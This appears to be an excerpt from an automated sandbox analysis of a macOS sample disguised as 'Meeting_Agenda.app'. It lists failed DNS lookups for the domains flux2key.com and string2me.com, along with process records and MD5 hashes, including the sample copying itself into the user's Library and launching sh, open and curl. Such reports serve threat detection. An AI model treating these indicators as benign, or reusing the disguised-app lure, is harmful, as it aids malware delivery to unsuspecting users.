Dez 24, 2018 09:34:58.404784918 MEZ | 56981 | 53 | 192.168.0.50 | 8.8.8.8
Dez 24, 2018 09:34:58.409457922 MEZ | 53 | 56981 | 8.8.8.8 | 192.168.0.50
Dez 24, 2018 09:34:58.622513056 MEZ | 55248 | 53 | 192.168.0.50 | 8.8.8.8
Dez 24, 2018 09:34:59.259896994 MEZ | 50843 | 53 | 192.168.0.50 | 8.8.8.8
Dez 24, 2018 09:34:59.469114065 MEZ | 53 | 50843 | 8.8.8.8 | 192.168.0.50
Dez 24, 2018 09:34:59.469690084 MEZ | 50843 | 53 | 192.168.0.50 | 8.8.4.4
Dez 24, 2018 09:34:59.627952099 MEZ | 55248 | 53 | 192.168.0.50 | 8.8.8.8
Dez 24, 2018 09:34:59.679302931 MEZ | 53 | 50843 | 8.8.4.4 | 192.168.0.50
Dez 24, 2018 09:34:59.835935116 MEZ | 53 | 55248 | 8.8.8.8 | 192.168.0.50
Dez 24, 2018 09:34:59.836395979 MEZ | 55248 | 53 | 192.168.0.50 | 8.8.4.4
Dez 24, 2018 09:35:00.049880981 MEZ | 53 | 55248 | 8.8.4.4 | 192.168.0.50

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Dez 24, 2018 09:34:58.622513056 MEZ | 192.168.0.50 | 8.8.8.8 | 0x47bb | Standard query (0) | flux2key.com | A (IP address) | IN (0x0001)
Dez 24, 2018 09:34:59.259896994 MEZ | 192.168.0.50 | 8.8.8.8 | 0x5aa1 | Standard query (0) | string2me.com | A (IP address) | IN (0x0001)
Dez 24, 2018 09:34:59.469690084 MEZ | 192.168.0.50 | 8.8.4.4 | 0x5aa1 | Standard query (0) | string2me.com | A (IP address) | IN (0x0001)
Dez 24, 2018 09:34:59.627952099 MEZ | 192.168.0.50 | 8.8.8.8 | 0x47bb | Standard query (0) | flux2key.com | A (IP address) | IN (0x0001)
Dez 24, 2018 09:34:59.836395979 MEZ | 192.168.0.50 | 8.8.4.4 | 0x47bb | Standard query (0) | flux2key.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dez 24, 2018 09:34:59.469114065 MEZ | 8.8.8.8 | 192.168.0.50 | 0x5aa1 | Server failure (2) | string2me.com | none | none | A (IP address) | IN (0x0001)
Dez 24, 2018 09:34:59.679302931 MEZ | 8.8.4.4 | 192.168.0.50 | 0x5aa1 | Server failure (2) | string2me.com | none | none | A (IP address) | IN (0x0001)
Dez 24, 2018 09:34:59.835935116 MEZ | 8.8.8.8 | 192.168.0.50 | 0x47bb | Server failure (2) | flux2key.com | none | none | A (IP address) | IN (0x0001)
Dez 24, 2018 09:35:00.049880981 MEZ | 8.8.4.4 | 192.168.0.50 | 0x47bb | Server failure (2) | flux2key.com | none | none | A (IP address) | IN (0x0001)

System Behavior

General

Start time: 09:34:56
Start date: 24/12/2018
Path: /usr/libexec/xpcproxy
File size: 43488 bytes
MD5 hash: d1bb9a4899f0af921e8188218b20d744

General

Start time: 09:34:56
Start date: 24/12/2018
Path: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode
File size: 109376 bytes
MD5 hash: c211dff0d9ecff416a1bf5a588ec2d5d

General

Start time: 09:34:57
Start date: 24/12/2018
Path: /bin/sh
File size: 618512 bytes
MD5 hash: 8aa60b22a5d30418a002b340989384dc

General

Start time: 09:34:57
Start date: 24/12/2018
Path: /usr/bin/open
File size: 105952 bytes
MD5 hash: 40ed6d8f35c9f20484b97582d296398f

General

Start time: 09:34:57
Start date: 24/12/2018
Path: /usr/libexec/xpcproxy
File size: 43488 bytes
MD5 hash: d1bb9a4899f0af921e8188218b20d744

General

Start time: 09:34:57
Start date: 24/12/2018
Path: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode
File size: 109376 bytes
MD5 hash: c211dff0d9ecff416a1bf5a588ec2d5d

General

Start time: 09:34:57
Start date: 24/12/2018
Path: /usr/bin/curl
File size: 185104 bytes
MD5 hash: 078cd73f58d3d8f875eed22522ff73f7